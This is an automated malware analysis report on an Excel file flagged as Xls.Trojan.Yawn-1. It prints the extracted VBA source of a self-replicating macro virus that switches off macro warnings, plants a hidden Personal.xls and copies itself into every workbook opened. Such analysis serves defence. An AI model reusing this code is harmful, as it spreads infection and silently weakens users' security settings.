Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5aa5cb519d330e48…

MALICIOUS

Office (OLE)

146.0 KB Created: 1997-01-14 01:50:29 Authoring application: Microsoft Excel First seen: 2015-10-06
MD5: 317bd34bafcfbe59e95af4723b3c6690 SHA-1: 100e7e40f2a63ed4a2649c96a596c4bef93b89d9 SHA-256: 5aa5cb519d330e4846d9f08d03108998992524ae9140b2b6297e8e8c0557b680
148 Risk Score

Heuristics 3

  • ClamAV: Xls.Trojan.Yawn-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Yawn-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Private Sub auto_open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6360 bytes
SHA-256: 231a6eae64a8b387b0354ece4d70a216a794477ef5ac6d16920d83c97f7bb73c
Detection
ClamAV: Xls.Trojan.Yawn-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AB"
Private Declare Function RegOpenKeyExA Lib "ADVAPI32.DLL" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegSetValueExA Lib "ADVAPI32.DLL" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib "ADVAPI32.DLL" (ByVal hKey As Long) As Long
Global Const REG_DWORD As Long = 4
Global Const HKEY_CURRENT_USER As Long = &H80000001
Dim ob1 As New Class1
Dim p As String
Dim AppS As String
'taitai
Private Sub auto_open()
    u = RegOpenKeyExA(HKEY_CURRENT_USER, "Software\Microsoft\Office\8.0\Excel\Microsoft Excel", 0, KEY_ALL_ACCESS, k)
    u = RegSetValueExA(k, "Options6", 0, REG_DWORD, Chr$(0), 4)
    u = RegCloseKey(k)
    p = Application.PathSeparator
    AppS = Application.StartupPath
    DelMcr
    If UCase(ThisWorkbook.Name) = "PERSONAL.XLS" Then
        Application.OnSheetActivate = "ActOpf_Evt"
        ActOpf_Evt
    Else
        CkStrUP
    End If
End Sub
Private Sub ActOpf_Evt()
    Set ob1.app = Application
End Sub
Private Sub Chk_Opf()
    On Error GoTo h_er
    Application.DisplayAlerts = False
    Application.ScreenUpdating = False
    awn = ActiveWorkbook.Name
    If Left(Right(awn, 4), 3) = ".xl" Then
        aw_m_n = Chk_Mo_N(awn)
        If aw_m_n = "" Then
            n = Chk_Mo_N(ThisWorkbook.Name)
            cop_m (n)
            Workbooks(awn).Save
        Else
            m_n = ActiveWorkbook.VBProject.VBComponents(aw_m_n).CodeModule.Lines(9, 1)
            If m_n <> "'taitai" Then
                Set v_c = ActiveWorkbook.VBProject.VBComponents
                For i = v_c.Count To 1 Step -1
                    If v_c(i).Type = 1 Or v_c(i).Type = 2 Then
                        v_c.Remove v_c(i)
                    End If
                Next i
                n = Chk_Mo_N(ThisWorkbook.Name)
                cop_m (n)
                Workbooks(awn).Save
            End If
        End If
    End If
    Application.ScreenUpdating = True
    Application.DisplayAlerts = True
    Exit Sub
h_er:
End Sub
Private Sub CkStrUP()
    Application.DisplayAlerts = False
    Application.ScreenUpdating = False
     f1 = "PERSONAL.XLS"
    If UCase(Dir(AppS & p & f1)) <> f1 Then
        cre_f
    ElseIf chk_per = False Then
        Workbooks("Personal.xls").Close
        Kill AppS & p & f1
        cre_f
    Else
    End If
    Workbooks("Personal.xls").Close
    Workbooks.Open AppS & p & "Personal.xls"
    Application.Run "Personal.xls!ActOpf_Evt"
    Application.OnSheetActivate = "'" & AppS & p & f1 & "'!ActOpf_Evt"
    Application.DisplayAlerts = True
    Application.ScreenUpdating = True
End Sub
Private Function chk_per()
   

    ar2 = ExecuteExcel4Macro(arg)
    ModuleName1 = Chk_Mo_N("Personal.xls")
    If ar2 <> ModuleName1 Then
        chk_per = False
    Else
        chk_per = True
    End If
End Function
Private Function Chk_Mo_N(WkName)
On Error Resume Next
    Set a1 = Workbooks(WkName).VBProject.VBComponents
    For i = 1 To a1.Count
        If a1(i).Type = 1 Then
            Chk_Mo_N = a1(i).Name
            Exit For
        Else
            Chk_Mo_N = ""
        End If
    Next i
End Function
Private Sub cre_f()
        Workbooks.Add
    n = Chk_Mo_N(ThisWorkbook.Name)
    Range("C1") = "=rand()"
    r_n = Chr((Range("C1") * 100) Mod 21 + 65) & _
        Chr((Val(Left(Right(Now(), 5), 2)) * 100) Mod 21 + 65)
    Range("C1") = r_n
    cop_m (n)
    ActiveWorkbook.VBProject.VBComponents(n).Name = r_n
    Set AW = ActiveWorkbook.Sheets
    For i = AW.Count To 2 Step -1
        AW(i).Delete
    Next i
    aw_n = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks(aw_n).SaveAs AppS & p & "Personal.xls"
End Sub
Private Function cop_m(n)
    On Error Resume Next
    Set TW = ThisWorkbook.VBProject.VBComponents
    Set AW = ActiveWorkbook.VBProject.VBComponents
    TW(n).Export (AppS & p & "t")
    AW.Import (AppS & p & "t")
    Kill (AppS & p & "t")
    TW("Class1").Export (AppS & p & "t")
    AW.Import (AppS & p & "t")
    Kill (AppS & p & "t")
End Function
Private Sub DelMcr()
    On Error Resume Next
    n1 = ActiveWorkbook.Name
    Set a2 = Application.CommandBars("Tools")
    a2.Reset
    If a2.Controls(10).ID = 30017 Then
        a2.Controls(10).Delete
    End If
    Workbooks(n1).Activate
End Sub

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public WithEvents app As Application
Attribute app.VB_VarHelpID = -1


Private Sub App_WorkbookOpen(ByVal Wb As Excel.Workbook)
    Application.Run "'" & Application.StartupPath & Application.PathSeparator & "Personal.xls'!Chk_Opf"
End Sub